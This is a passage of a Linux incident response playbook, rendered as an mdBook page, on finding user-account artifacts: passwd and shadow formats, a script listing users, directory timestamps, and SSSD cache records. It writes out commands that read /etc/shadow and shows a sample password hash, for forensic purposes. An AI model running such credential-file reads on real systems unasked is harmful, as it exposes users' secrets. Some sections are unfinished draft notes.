<!DOCTYPE HTML>
<html lang="en" class="sidebar-visible no-js light">
    <head>
        <!-- Book generated using mdBook -->
        <meta charset="UTF-8">
        <title>Digital forensics &amp; Intrusion Response Playbook - *nix OS</title>
        <meta name="robots" content="noindex" />


        <!-- Custom HTML head -->
        
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="theme-color" content="#ffffff" />

        <link rel="icon" href="favicon.svg">
        <link rel="shortcut icon" href="favicon.png">
        <link rel="stylesheet" href="css/variables.css">
        <link rel="stylesheet" href="css/general.css">
        <link rel="stylesheet" href="css/chrome.css">
        <link rel="stylesheet" href="css/print.css" media="print">

        <!-- Fonts -->
        <link rel="stylesheet" href="FontAwesome/css/font-awesome.css">
        <link rel="stylesheet" href="fonts/fonts.css">

        <!-- Highlight.js Stylesheets -->
        <link rel="stylesheet" href="highlight.css">
        <link rel="stylesheet" href="tomorrow-night.css">
        <link rel="stylesheet" href="ayu-highlight.css">

        <!-- Custom theme stylesheets -->

    </head>
    <body>
    <div id="body-container">
        <!-- Provide site root to javascript -->
        <script>
            var path_to_root = "";
            var default_theme = window.matchMedia("(prefers-color-scheme: dark)").matches ? "navy" : "light";
        </script>

        <!-- Work around some values being stored in localStorage wrapped in quotes -->
        <script>
            try {
                var theme = localStorage.getItem('mdbook-theme');
                var sidebar = localStorage.getItem('mdbook-sidebar');

                if (theme.startsWith('"') && theme.endsWith('"')) {
                    localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
                }

                if (sidebar.startsWith('"') && sidebar.endsWith('"')) {
                    localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
                }
            } catch (e) { }
        </script>

        <!-- Set the theme before any content is loaded, prevents flash -->
        <script>
            var theme;
            try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { }
            if (theme === null || theme === undefined) { theme = default_theme; }
            var html = document.querySelector('html');
            html.classList.remove('no-js')
            html.classList.remove('light')
            html.classList.add(theme);
            html.classList.add('js');
        </script>

        <!-- Hide / unhide sidebar before it is displayed -->
        <script>
            var html = document.querySelector('html');
            var sidebar = null;
            if (document.body.clientWidth >= 1080) {
                try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
                sidebar = sidebar || 'visible';
            } else {
                sidebar = 'hidden';
            }
            html.classList.remove('sidebar-visible');
            html.classList.add("sidebar-" + sidebar);
        </script>

        <nav id="sidebar" class="sidebar" aria-label="Table of contents">
            <div class="sidebar-scrollbox">
                <ol class="chapter"><li class="chapter-item expanded affix "><a href="index.html">Introduction</a></li><li class="chapter-item expanded affix "><a href="recommended_reading.html">Recommended Reading</a></li><li class="chapter-item expanded affix "><a href="incident_handling.html">Incident Handling</a></li><li class="chapter-item expanded "><a href="os_accounts.html"><strong aria-hidden="true">1.</strong> User Accounts</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="os_accounts_local.html"><strong aria-hidden="true">1.1.</strong> Local User Accounts</a></li><li class="chapter-item expanded "><a href="os_accounts_ad.html"><strong aria-hidden="true">1.2.</strong> Active Directory Accounts</a></li><li class="chapter-item expanded "><a href="os_accounts_forensics.html"><strong aria-hidden="true">1.3.</strong> Forensic Artifacts</a></li></ol></li><li class="chapter-item expanded "><a href="lateral_movement.html"><strong aria-hidden="true">2.</strong> Lateral Movement</a></li><li class="chapter-item expanded "><a href="persistence.html"><strong aria-hidden="true">3.</strong> Persistence</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="persistence_cron.html"><strong aria-hidden="true">3.1.</strong> Cron Jobs</a></li><li class="chapter-item expanded "><a href="persistence_systemd.html"><strong aria-hidden="true">3.2.</strong> Systemd Services</a></li><li class="chapter-item expanded "><a href="persistence_scripts.html"><strong aria-hidden="true">3.3.</strong> Scripts</a></li><li class="chapter-item expanded "><a href="persistence_forensics.html"><strong aria-hidden="true">3.4.</strong> Forensic Artifacts</a></li></ol></li><li class="chapter-item expanded "><a href="execution.html"><strong aria-hidden="true">4.</strong> Execution</a></li><li class="chapter-item expanded "><a href="network.html"><strong aria-hidden="true">5.</strong> Network</a></li><li><ol class="section"><li class="chapter-item expanded "><a href="webhistory.html"><strong aria-hidden="true">5.1.</strong> Web History</a></li><li class="chapter-item expanded "><a href="open_ports.html"><strong aria-hidden="true">5.2.</strong> Open Ports</a></li><li class="chapter-item expanded "><a href="active_connections.html"><strong aria-hidden="true">5.3.</strong> Active Connections</a></li><li class="chapter-item expanded "><a href="dns_cache.html"><strong aria-hidden="true">5.4.</strong> DNS Cache records</a></li></ol></li><li class="chapter-item expanded "><a href="exfiltration.html"><strong aria-hidden="true">6.</strong> Data Exfiltration</a></li><li class="chapter-item expanded "><a href="config.html"><strong aria-hidden="true">7.</strong> System Configuration</a></li><li class="chapter-item expanded "><a href="applications.html"><strong aria-hidden="true">8.</strong> Installed Applications</a></li></ol>
            </div>
            <div id="sidebar-resize-handle" class="sidebar-resize-handle"></div>
        </nav>

        <div id="page-wrapper" class="page-wrapper">

            <div class="page">
                                <div id="menu-bar-hover-placeholder"></div>
                <div id="menu-bar" class="menu-bar sticky bordered">
                    <div class="left-buttons">
                        <button id="sidebar-toggle" class="icon-button" type="button" title="Toggle Table of Contents" aria-label="Toggle Table of Contents" aria-controls="sidebar">
                            <i class="fa fa-bars"></i>
                        </button>
                        <button id="theme-toggle" class="icon-button" type="button" title="Change theme" aria-label="Change theme" aria-haspopup="true" aria-expanded="false" aria-controls="theme-list">
                            <i class="fa fa-paint-brush"></i>
                        </button>
                        <ul id="theme-list" class="theme-popup" aria-label="Themes" role="menu">
                            <li role="none"><button role="menuitem" class="theme" id="light">Light</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="rust">Rust</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="coal">Coal</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="navy">Navy</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="ayu">Ayu</button></li>
                        </ul>
                        <button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
                            <i class="fa fa-search"></i>
                        </button>
                    </div>

                    <h1 class="menu-title">Digital forensics &amp; Intrusion Response Playbook - *nix OS</h1>

                    <div class="right-buttons">
                        <a href="print.html" title="Print this book" aria-label="Print this book">
                            <i id="print-button" class="fa fa-print"></i>
                        </a>

                    </div>
                </div>

                <div id="search-wrapper" class="hidden">
                    <form id="searchbar-outer" class="searchbar-outer">
                        <input type="search" id="searchbar" name="searchbar" placeholder="Search this book ..." aria-controls="searchresults-outer" aria-describedby="searchresults-header">
                    </form>
                    <div id="searchresults-outer" class="searchresults-outer hidden">
                        <div id="searchresults-header" class="searchresults-header"></div>
                        <ul id="searchresults">
                        </ul>
                    </div>
                </div>

                <!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
                <script>
                    document.getElementById('sidebar-toggle').setAttribute('aria-expanded', sidebar === 'visible');
                    document.getElementById('sidebar').setAttribute('aria-hidden', sidebar !== 'visible');
                    Array.from(document.querySelectorAll('#sidebar a')).forEach(function(link) {
                        link.setAttribute('tabIndex', sidebar === 'visible' ? 0 : -1);
                    });
                </script>

                <div id="content" class="content">
                    <main>
                        <h1 id="introduction"><a class="header" href="#introduction">Introduction</a></h1>
<p><strong>TuxTriage Playbook</strong> is an incident response playbook specifically targeting the Linux Operating Systems. The primary objective of this playbook is to help triage a live suspicious host. Following this playbook will allow an examiner to rapidly triage an incident and gather evidence to support their claims. </p>
<p><strong>TuxTriage Playbook</strong> will attempt to answer the following questions about a suspicious host:</p>
<ul>
<li>
<p><strong>User accounts</strong>: What user accounts are present on the system? What are their permissions? Have any user accounts been created or modified recently?</p>
</li>
<li>
<p><strong>Lateral movemen</strong>t: Has the attacker been able to move laterally to other systems on the network? If so, how did they do it?</p>
</li>
<li>
<p><strong>Malware persistence</strong>: How has the malware persisted on the system? Is it using any known techniques, such as autoruns?</p>
</li>
<li>
<p><strong>Data theft</strong>: Has the attacker attempted to access any data from the system?</p>
</li>
<li>
<p><strong>Configuration management</strong>: What is the current state of the system's configuration? Have any changes been made to the system recently?</p>
</li>
</ul>
<div style="break-before: page; page-break-before: always;"></div><h1 id="recommended-reading"><a class="header" href="#recommended-reading">Recommended Reading</a></h1>
<p>The following resources provide substansial background on the cyber incident response process. </p>
<h2 id="cisa-cybersecurity-incident--vulnerability-response-playbooks-1"><a class="header" href="#cisa-cybersecurity-incident--vulnerability-response-playbooks-1">CISA: Cybersecurity Incident &amp; Vulnerability Response Playbooks <sup class="footnote-reference"><a href="#cisa">1</a></sup></a></h2>
<p>Operational Procedures for Planning and Conducting Cybersecurity Incident and Vulnerability Response Activities in FCEB Information Systems.</p>
<h3 id="when-to-use-this-playbook"><a class="header" href="#when-to-use-this-playbook">When to use this playbook</a></h3>
<p>Use this playbook for incidents that involve confirmed malicious cyber activity for which a major incident has been declared or not yet been reasonably ruled out.</p>
<h2 id="nist-computer-security-incident-handling-guide-2"><a class="header" href="#nist-computer-security-incident-handling-guide-2">NIST: Computer Security Incident Handling Guide <sup class="footnote-reference"><a href="#nist">2</a></sup></a></h2>
<p>This document has been created for computer security incident response teams (CSIRTs), system and network administrators, security staff, technical support staff, chief information officers (CIOs), computer security program managers, and others who are responsible for preparing for, or responding to, security incidents</p>
<h2 id="cert-sg-unixlinux-intrusion-detection--3"><a class="header" href="#cert-sg-unixlinux-intrusion-detection--3">CERT SG: UNIX/LINUX Intrusion Detection  <sup class="footnote-reference"><a href="#SG">3</a></sup></a></h2>
<p>A cheat sheet dedicated to handlers investifating on a precise security issue. </p>
<h3 id="who-should-use-irm-sheets"><a class="header" href="#who-should-use-irm-sheets">Who should use IRM sheets</a></h3>
<ul>
<li>Administrators </li>
<li>Security Operation Center </li>
<li>CISOs and deputies </li>
<li>CERTs </li>
</ul>
<div class="footnote-definition" id="cisa"><sup class="footnote-definition-label">1</sup>
<p>https://www.cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf</p>
</div>
<div class="footnote-definition" id="nist"><sup class="footnote-definition-label">2</sup>
<p>https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf </p>
</div>
<div class="footnote-definition" id="SG"><sup class="footnote-definition-label">3</sup>
<p>https://github.com/certsocietegenerale/IRM/blob/main/EN/IRM-3-UnixLinuxIntrusionDetection.pdf</p>
</div>
<div style="break-before: page; page-break-before: always;"></div><h1 id="incident-handling-steps"><a class="header" href="#incident-handling-steps">Incident Handling Steps</a></h1>
<p>The incident response life cycle as defined by NIST Computer Security
Incident Handling Guide<sup class="footnote-reference"><a href="#nist">1</a></sup> has the following 5 steps:</p>
<ul>
<li><strong>Preparation</strong> </li>
<li><strong>Detection &amp; Analysis</strong></li>
<li><strong>Containment, Eradication &amp; Recovery</strong></li>
<li><strong>Post-Incident Activity</strong></li>
</ul>
<p>This playbook may be used to aid in the first two steps of the life cycle. </p>
<h2 id="preparation-phase"><a class="header" href="#preparation-phase">Preparation Phase</a></h2>
<p>The preparation phase calls for the establishment and training of an incident response team along with acquiring the necessary tools and resources to perform the response activities. 
This playbook is designed as a training guide for analysts working with Linux OS. </p>
<h2 id="detection--analysis"><a class="header" href="#detection--analysis">Detection &amp; Analysis</a></h2>
<p>Signs of an incident fall into one of two categories: <em>precursors</em> and <em>indicators</em>. A precursor is a sign that an incident may occur in the future. An indicator is a sign that an incident may have occurred or may be
occurring now <sup class="footnote-reference"><a href="#nist">1</a></sup>.</p>
<p>The playbook serves as a handbook and provides the sources for <em>indicators</em>. It details where to look for indicators, what conclusions can be drawn from the indicators as well as the data structure and organization of such artifacts. </p>
<div class="footnote-definition" id="nist"><sup class="footnote-definition-label">1</sup>
<p>https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf </p>
</div>
<div class="footnote-definition" id="SG"><sup class="footnote-definition-label">2</sup>
<p>https://github.com/certsocietegenerale/IRM/blob/main/EN/IRM-3-UnixLinuxIntrusionDetection.pdf</p>
</div>
<div style="break-before: page; page-break-before: always;"></div><h1 id="user-accounts"><a class="header" href="#user-accounts">User Accounts</a></h1>
<p>User accounts are a crucial component of any digital forensics investigation. They provide valuable information about who had access to a system, what they did while logged in, and what resources they may have accessed. </p>
<p>User accounts can be local to the host or managed centrally using Active Directory, OpenLDAP, Novell eDirectory, etc.</p>
<p>There are three main types of user accounts on a Linux System:</p>
<ul>
<li>
<p><strong>Superuser account</strong>: Also known as the root, this account has full administrative privileges on the system. </p>
</li>
<li>
<p><strong>Regular user account</strong>: Regular user accounts have limited access to the system. They may only access files and resources they are explicitly granted access. A regular user can be granted additional privileges by adding the user to a group with the desired privileges or by granting the user specific permissions on specific files or directories. </p>
</li>
<li>
<p><strong>System account (Service account)</strong>: System accounts correspond to a service running on the system rather than to someone using the system. Service accounts are used by system services such as web servers, mail transport agents, databases etc. Note that there is no formal distinction between a regular user account vs. a system/service account at a system level. The key differences are that a regular user account has a login shell and wider privileges. </p>
</li>
</ul>
<h2 id="domain-user"><a class="header" href="#domain-user">Domain User</a></h2>
<ul>
<li>AD user </li>
<li>Home directory Example </li>
<li>No entry in the local files </li>
<li>WHAT OTHER ARTIFACT IS THERE </li>
<li>HOW DOES THE LOGON PROMPT KNOW TO ASK AGAIN IN GNOME </li>
<li></li>
</ul>
<p>there is a cache we can look for</p>
<h2 id="forensic-evidence"><a class="header" href="#forensic-evidence">Forensic Evidence</a></h2>
<ul>
<li>
<p>Command to list the shadow files </p>
</li>
<li>
<p>ls the home dir with time stamps </p>
<ul>
<li>lastlog</li>
</ul>
</li>
<li>
<p>Figure out earliest access date </p>
</li>
<li>
<p>Latest date? only from log? </p>
</li>
<li>
<p>LOG FILE analysis to look for users that are not accounted for </p>
</li>
<li>
<p>FILEs - what info is stored in file metadata about users </p>
</li>
</ul>
<div style="break-before: page; page-break-before: always;"></div><h1 id="local-user-accounts"><a class="header" href="#local-user-accounts">Local User Accounts</a></h1>
<p>These are accounts local to the host. </p>
<p>Local account information are stored in two files. </p>
<pre><code class="language-bash">/etc/passwd 
</code></pre>
<pre><code class="language-bash">/etc/shadow
</code></pre>
<p>Additionally group information is saved at the following location.</p>
<pre><code class="language-bash">/etc/group
</code></pre>
<pre><code class="language-bash">/etc/gshadow
</code></pre>
<h2 id="etcpasswd-1"><a class="header" href="#etcpasswd-1">/etc/passwd <sup class="footnote-reference"><a href="#rhel_pswd">1</a></sup></a></h2>
<p>The <code>/etc/passwd</code> file is a text file. Each line represents information about a single user account. This fields are seperated by a colon (<code>:</code>) symbol. There are seven fields saved in each row <sup class="footnote-reference"><a href="#nxcraft">2</a></sup>.</p>
<pre><code class="language-bash">[tlasso@rhel-richmondfc ~]$ cat /etc/passwd | grep tlasso
tlasso:x:1000:1001:tlasso:/home/tlasso:/bin/bash
[tlasso@rhel-richmondfc ~]$
</code></pre>
<ol>
<li><code>Username</code>: The user name of the user. </li>
<li><code>Password</code>: An x character indicates that the password is in the <code>/etc/shadow</code> file. </li>
<li><code>User ID (UID)</code>: A unique id assigned to the user</li>
<li><code>Group ID (GID)</code>: The primary group ID. </li>
<li><code>User ID Info</code>: Additional user information </li>
<li><code>Home Directory</code>: Home directory of a user</li>
<li><code>Command/shell</code>: Typically this is a shell. But if an account does not have interactive logon privileges then this can be set to <code>/sbin/nologin</code></li>
</ol>
<h2 id="etcshadow-3"><a class="header" href="#etcshadow-3">/etc/shadow <sup class="footnote-reference"><a href="#rhel_shdw">3</a></sup></a></h2>
<p>The <code>/etc/shadow</code> file contains one entry per line for each user account on the system. Each entry consists of several fields separated by colons (<code>:</code>). The fields typically include the username, password hash, and various account-related information such as password expiration, account expiration, and account locking.</p>
<p>The password hash stored in the <code>/etc/shadow</code> file is an encrypted version of the user's password. When a user attempts to log in, the system takes the password entered by the user, applies the same encryption algorithm, and compares the resulting hash with the one stored in the <code>/etc/shadow</code> file. If the hashes match, the user is granted access.</p>
<pre><code class="language-bash">[tlasso@rhel-richmondfc ~]$ sudo cat /etc/shadow | grep tlasso
tlasso:$6$jP1ap6xJUfvAgVjH$JxTdfXUOIqbpa3FpgALilTJvGnUfuUcDn8Qz.cxBf6yrFjo2332IHsCkHtg9QCHM7A4p9EcOZn.tXBWYK3RVO0::0:99999:7:::
</code></pre>
<ol>
<li><code>Username</code>: The user name of the user.</li>
<li><code>Password</code>: Encrypted password in hash format.</li>
<li><code>Last password change date</code>: Data type is Long. 0 indicates that the user must change the password on next logon. Empty value inidcates that feature is disabled. A long value greater than 0 indicates the date of password change expressed in the form of days since Unix epoch. </li>
</ol>
<h2 id="etcgroup-4"><a class="header" href="#etcgroup-4">/etc/group <sup class="footnote-reference"><a href="#rhel_grp">4</a></sup></a></h2>
<p>The <code>/etc/group</code> file contains a list of groups, one entry per line. Each line is colon delimited and contains four fields. </p>
<pre><code class="language-bash">[tlasso@rhel-richmondfc ~]$ sudo cat /etc/group | grep tlasso
wheel:x:10:tlasso
coaching-staff:x:1000:tlasso
</code></pre>
<ol>
<li><code>Group name</code>: Name of the group </li>
<li><code>Group Password</code>: When this field is set to <code>x</code>, then a password is required to join the group. </li>
<li><code>Group Id (GID)</code>: A numeric group id</li>
<li><code>Member List</code>: The list of users that belong to the group. List is comma seperated. </li>
</ol>
<h2 id="etcgshadow-5"><a class="header" href="#etcgshadow-5">/etc/gshadow <sup class="footnote-reference"><a href="#rhel_grp_shdw">5</a></sup></a></h2>
<p>The <code>/etc/gshadow</code> file contains the encrypted group password, group membership and administrator information. This file also contains information per group per line. It is colon delimeted and lists the members of the group in a comma seperated list </p>
<pre><code class="language-bash">[tlasso@rhel-richmondfc ~]$ sudo cat /etc/gshadow | grep tlasso
wheel:::tlasso
coaching-staff:!::tlasso 
</code></pre>
<ol>
<li><code>Group name</code> : Name of the group </li>
<li><code>Encrypted password</code>: Group password</li>
<li><code>Group administrators</code>: Comma delimited list of users. Add or remove from this list using <code>gpasswd</code> command. </li>
<li><code>Group members</code> : Non-admin group members.</li>
</ol>
<h2 id="user-account-creation"><a class="header" href="#user-account-creation">User account creation</a></h2>
<p>Please refer to RHEL<sup class="footnote-reference"><a href="#rhel_doc">6</a></sup> documentation for details and command references for user creation. </p>
<div class="footnote-definition" id="rhel_doc"><sup class="footnote-definition-label">6</sup>
<p>https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/s2-users-cl-tools</p>
</div>
<div class="footnote-definition" id="nxcraft"><sup class="footnote-definition-label">2</sup>
<p>https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/</p>
</div>
<div class="footnote-definition" id="rhel_pswd"><sup class="footnote-definition-label">1</sup>
<p>https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/introduction_to_system_administration/s2-acctsgrps-files#s3-acctsgrps-passwd</p>
</div>
<div class="footnote-definition" id="rhel_shdw"><sup class="footnote-definition-label">3</sup>
<p>https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/introduction_to_system_administration/s3-acctsgrps-shadow</p>
</div>
<div class="footnote-definition" id="rhel_grp"><sup class="footnote-definition-label">4</sup>
<p>https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/introduction_to_system_administration/s3-acctspgrps-group</p>
</div>
<div class="footnote-definition" id="rhel_grp_shdw"><sup class="footnote-definition-label">5</sup>
<p>https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/introduction_to_system_administration/s3-acctsgrps-gshadow</p>
</div>
<div style="break-before: page; page-break-before: always;"></div><h1 id="active-directory-accounts"><a class="header" href="#active-directory-accounts">Active Directory Accounts</a></h1>
<p>Active directory accounts are managed by the AD server. No local entries are manintained by the host regarding them. </p>
<p>System Security Services Daemon <code>(SSSD)</code> is generally used by RHEL for AD based authentication. </p>
<p>This is not limited to AD, the following combinations are supported. <sup class="footnote-reference"><a href="#rhel_sssd">1</a></sup></p>
<div class="table-wrapper"><table><thead><tr><th>Identity Provider</th><th>Authentication Provider</th></tr></thead><tbody>
<tr><td>Identity Management</td><td>Identity Management</td></tr>
<tr><td>Active Directory</td><td>Active Directory</td></tr>
<tr><td>LDAP</td><td>LDAP</td></tr>
<tr><td>LDAP</td><td>Kerberos</td></tr>
<tr><td>Proxy</td><td>Proxy</td></tr>
<tr><td>Proxy</td><td>LDAP</td></tr>
<tr><td>Proxy</td><td>Kerberos</td></tr>
</tbody></table>
</div>
<p>SSSD does not create user accounts on the local system. However, SSSD can be configured to create home directories for IdM users. Once created, an IdM user home directory and its contents on the client are not deleted when the user logs out <sup class="footnote-reference"><a href="#rhel_sssd">1</a></sup>. </p>
<p><img src="images/sssd_cache.png" alt="SSSD Works" /></p>
<p>SSSD maintains a local cache about the users that attempted to logon to the local system. </p>
<h3 id="uidgid-for-ad-users"><a class="header" href="#uidgid-for-ad-users">UID/GID for AD Users</a></h3>
<p>Windows uses security ids (SID) and is incompatible with Linux UID/SID. SSSD autogenerates the UID and GID from the SIDs when the user logs on to a linux host for the first time. This information is cached as mentioned above. Note that the UID generated from a SID is always the same. </p>
<p>ID mapping can be disabled. This should be used if AD defined POSIX attributes are to be used instead. </p>
<div class="footnote-definition" id="rhel_sssd"><sup class="footnote-definition-label">1</sup>
<p>https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/configuring_authentication_and_authorization_in_rhel/understanding-sssd-and-its-benefits_configuring-authentication-and-authorization-in-rhel</p>
</div>
<div style="break-before: page; page-break-before: always;"></div><h1 id="forensic-artifacts"><a class="header" href="#forensic-artifacts">Forensic Artifacts</a></h1>
<p>There exists a number of utility programs that can generate the information listed below such as <code>wbinfo</code> and <code>getent</code>. Since we are interested in forensic evidence artifacts that can be collected and reviewed offline the focus here is to examine the file contents directly. This is also required when we are presented with a disk image of a system and not the live running system.</p>
<h3 id="unexpected-local-user-accounts"><a class="header" href="#unexpected-local-user-accounts">Unexpected Local user accounts</a></h3>
<p>Look for unusual user accounts in the <code>/etc/passwd</code> </p>
<pre><code class="language-bash">#!/bin/bash
NI_SHELLS=&quot;/sbin/nologin|/sbin/false|/sbin/true|/bin/sync|/sbin/shutdown|/sbin/halt&quot;

echo &quot;Non Interactive / Service Accounts&quot;
echo &quot;**********************************&quot;
egrep $NI_SHELLS /etc/passwd | cut -d: -f1 

echo &quot;&quot; 
echo &quot;Interactive Users&quot;
echo &quot;*****************&quot;
egrep -v $NI_SHELLS /etc/passwd | cut -d: -f1

echo &quot;&quot; 

</code></pre>
<h5 id="sample-output"><a class="header" href="#sample-output">Sample output</a></h5>
<pre><code class="language-bash">
[tlasso@rhel-richmondfc scripts]$ ./list_users.sh 
Non Interactive / Service Accounts
**********************************
bin
daemon
adm
lp
sync
shutdown
halt
mail
operator
games
ftp
nobody
systemd-coredump
dbus
polkitd
avahi
tss
colord
clevis
rtkit
sssd
geoclue
libstoragemgmt
systemd-oom
setroubleshoot
pipewire
flatpak
gdm
cockpit-ws
cockpit-wsinstance
gnome-initial-setup
sshd
chrony
dnsmasq
tcpdump



Interactive Users
*****************
root
tlasso

</code></pre>
<p>The <code>/etc/group</code>, <code>/etc/shadow</code>, <code>/etc/gshadow</code> must be cross referenced to check for any user ids or groups that are not recognized.<br />
This can be sign of an orphaned user account that was not removed correctly. </p>
<h3 id="account-earliest-activity--deleted-accounts"><a class="header" href="#account-earliest-activity--deleted-accounts">Account Earliest Activity &amp; Deleted Accounts</a></h3>
<p>The user home directory is created for all interactive users (unless explicitly configured). </p>
<p>Examine the <code>/home/</code> folder for a list of home directories. </p>
<pre><code class="language-bash">[tlasso@rhel-richmondfc ~]$ sudo ls -al /home
total 12
drwxr-xr-x.  5 root      root        84 Jun 14 03:21 .
dr-xr-xr-x. 18 root      root       235 Jun 14 02:26 ..
drwx------. 14 357201109 357200513 4096 Jun 14 03:23 nate@corp.tuxtriage.net
drwx------. 15 tlasso    tlasso    4096 Jun 18 19:25 tlasso
drwx------. 14 357201108 357200513 4096 Jun 14 03:14 tlasso@corp.tuxtriage.net
</code></pre>
<p>Note that in the above example there are two tlasso users. The <code>tlasso</code> user is a local system user while the <code>tlasso@corp.tuxtriage.net</code> is an AD user. </p>
<p>Since one of the first things the system does when a user is created is the creation of the home directory, this information can be approximated to the earliest presense of this user on the host. </p>
<p>If the investigation timelines are outside the earliest activity date, the user account may not be part of the incident. </p>
<p>The <code>Birth time</code> of the folder can be used for this purpose. </p>
<pre><code class="language-bash">[tlasso@rhel-richmondfc ~]$ stat /home/*
  File: /home/nate@corp.tuxtriage.net
  Size: 4096      	Blocks: 8          IO Block: 4096   directory
Device: fd00h/64768d	Inode: 102693422   Links: 14
Access: (0700/drwx------)  Uid: (357201109/ UNKNOWN)   Gid: (357200513/ UNKNOWN)
Context: unconfined_u:object_r:user_home_dir_t:s0
Access: 2023-06-14 03:21:01.790738178 -0400
Modify: 2023-06-14 03:23:10.091326083 -0400
Change: 2023-06-14 03:23:10.091326083 -0400
 Birth: 2023-06-14 03:21:01.790738178 -0400
  File: /home/tlasso
  Size: 4096      	Blocks: 8          IO Block: 4096   directory
Device: fd00h/64768d	Inode: 69333680    Links: 15
Access: (0700/drwx------)  Uid: ( 1000/  tlasso)   Gid: ( 1001/  tlasso)
Context: unconfined_u:object_r:user_home_dir_t:s0
Access: 2023-06-18 19:32:30.473261644 -0400
Modify: 2023-06-18 19:25:15.008942407 -0400
Change: 2023-06-18 19:25:15.008942407 -0400
 Birth: 2023-06-14 02:30:33.307059622 -0400
  File: /home/tlasso@corp.tuxtriage.net
  Size: 4096      	Blocks: 8          IO Block: 4096   directory
Device: fd00h/64768d	Inode: 101569584   Links: 14
Access: (0700/drwx------)  Uid: (357201108/ UNKNOWN)   Gid: (357200513/ UNKNOWN)
Context: unconfined_u:object_r:user_home_dir_t:s0
Access: 2023-06-14 03:11:59.697315839 -0400
Modify: 2023-06-14 03:14:12.457619105 -0400
Change: 2023-06-14 03:14:12.457619105 -0400
 Birth: 2023-06-14 03:11:59.697315839 -0400
</code></pre>
<h3 id="sssd-cache"><a class="header" href="#sssd-cache">SSSD Cache</a></h3>
<p>Any user that logs on via AD does not leave much trace on the system maintained files such as <code>/etc/passwd</code> etc. However, there are cache files that are updated as part of the logon process that can be analyzed to detect malicious user activity. </p>
<p>SSSD cache is located at <code>/var/lib/sss/db</code>. </p>
<pre><code class="language-bash">[tlasso@rhel-richmondfc scripts]$ sudo ls /var/lib/sss/db
cache_corp.tuxtriage.net.ldb  ccache_CORP.TUXTRIAGE.NET  config.ldb  sssd.ldb  timestamps_corp.tuxtriage.net.ldb
</code></pre>
<p>Of interest to us is the <code>cache_corp.tuxtriage.net.ldb</code> ldb database. See details about lbd format here <sup class="footnote-reference"><a href="#ldb">1</a></sup>.</p>
<p><code>ldbsearch</code> command can be used to search this database for records of interest. </p>
<pre><code class="language-bash">tlasso@rhel-richmondfc scripts]$ sudo ldbsearch -H /var/lib/sss/db/cache_corp.tuxtriage.net.ldb
asq: Unable to register control with rootdse!
# record 1
dn: gpoGUID={31B2F340-016D-11D2-945F-00C04FB984F9},cn=gpos,cn=ad,cn=custom,cn=corp.tuxtriage.net,cn=sysdb
gpoGUID: {31B2F340-016D-11D2-945F-00C04FB984F9}
gpoVersion: 3
objectClass: gpo
gpoPolicyFileTimeout: 1686727266
distinguishedName: gpoGUID={31B2F340-016D-11D2-945F-00C04FB984F9},cn=gpos,cn=a
 d,cn=custom,cn=corp.tuxtriage.net,cn=sysdb
...

# record 3
dn: name=tlasso@corp.tuxtriage.net,cn=users,cn=corp.tuxtriage.net,cn=sysdb
createTimestamp: 1686726711
fullName: Ted Lasso
gecos: Ted Lasso
gidNumber: 357200513
name: tlasso@corp.tuxtriage.net
objectCategory: user
uidNumber: 357201108
objectSIDString: S-1-5-21-2369507818-3716282536-1365522936-1108
uniqueID: 5e499899-1305-460b-82d9-87a949f32d18
originalDN: CN=Ted Lasso,CN=Users,DC=corp,DC=tuxtriage,DC=net
originalModifyTimestamp: 20230614062722.0Z
entryUSN: 41335
userPrincipalName: tlasso@CORP.TUXTRIAGE.NET
adAccountExpires: 9223372036854775807
adUserAccountControl: 512
nameAlias: tlasso@corp.tuxtriage.net
isPosix: TRUE
lastUpdate: 1686726711
dataExpireTimestamp: 1686732111
initgrExpireTimestamp: 0
ccacheFile: KCM:
cachedPasswordType: 1
failedLoginAttempts: 0
memberof: name=Domain Users@corp.tuxtriage.net,cn=groups,cn=corp.tuxtriage.net
 ,cn=sysdb
pacBlob:: BwAAAAAAAAABAAAA2AEAAHgAAAAAAAAABgAAABAAAABQAgAAAAAAAAcAAAAQAAAAYAIA
 AAAAAAAKAAAAFgAAAHACAAAAAAAADAAAAKgAAACIAgAAAAAAABAAAAAQAAAAMAMAAAAAAAATAAAAE
 AAAAEADAAAAAAAAARAIAMzMzMzIAQAAAAAAAAAAAgCpHPiCj57ZAf////////9//////////38lSO
 9GiZ7ZASUIWXFSn9kBJchIPIq/2QEMAAwABAACABIAEgAIAAIAAAAAAAwAAgAAAAAAEAACAAAAAAA
 UAAIAAAAAABgAAgABAAAAVAQAAAECAAABAAAAHAACACAAAAAAAAAAAAAAAAAAAAAAAAAAHgAgACAA
 AgAIAAoAJAACACgAAgAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAA
 CwAAgAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAB0AGwAYQBzAHMAbwAJAAAAAAAAAAkAAABUAGUAZA
 AgAEwAYQBzAHMAbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
